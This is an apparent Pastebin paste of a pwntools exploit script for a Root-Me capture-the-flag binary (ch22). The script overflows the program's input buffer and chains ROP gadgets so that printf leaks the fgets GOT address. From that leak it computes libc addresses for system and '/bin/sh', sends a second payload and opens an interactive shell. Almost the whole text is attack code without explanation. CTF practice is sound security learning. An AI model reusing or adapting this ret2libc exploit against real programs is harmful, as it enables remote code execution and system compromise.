Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- app-systeme-ch22@challenge03:~$ python -c '
- from pwn import *
- from time import sleep
- b = ELF("/challenge/app-systeme/ch22/ch22")
- sled = 48 * "n"
- addrmain = p32(b.symbols["main"])
- #addrmain = p32(0x080485a4)
- #addrmain = p32(0x80485b1)
- bss = p32(0x0804a020)
- size = p32(0x10)
- stdin = p32(0x0804a024)
- gadget_pop_ebx = p32(0x08048573)
- gadget_call_eax = p32(0x0804859f)
- fgets = p32(b.symbols["got.fgets"])
- printf = p32(b.symbols["printf"])
- context.log_level = 2
- pay = sled + printf + gadget_pop_ebx +fgets + gadget_pop_ebx + addrmain #+"\naaa"
- p = process("/challenge/app-systeme/ch22/ch22")
- #p = remote("challenge03.root-me.org",56522)
- #p=gdb.debug("/challenge/app-systeme/ch22/ch22")
- context.timeout=100000
- p.recv(timeout=1)
- p.sendline(pay)
- buf = p.recvline(timeout=1)
- p.sendline("")
- buf = p.recvline(timeout=1)
- log.info(buf)
- leak_fgets = u32(buf[0:4])
- leak_system = leak_fgets - 0x28db0
- leak_binsh = leak_fgets+0x11811F
- leak_exit = leak_fgets-0x35be0
- leak_printf = leak_fgets - 0x14ce0
- log.info("Leak got fgets: "+str(hex(leak_fgets)))
- log.info("Leak calculate system: "+str(hex(leak_system)))
- log.info("Leak /bin/sh: "+str(hex(leak_binsh)))
- #pay = sled + p32(leak_system) + gadget_pop_ebx +p32(leak_binsh) +addrmain
- p.sendline(pay)
- buf = p.recvline(timeout=1)
- p.sendline("")
- buf = p.recvline(timeout=1)
- log.info(buf)
- p.interactive()
- '
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement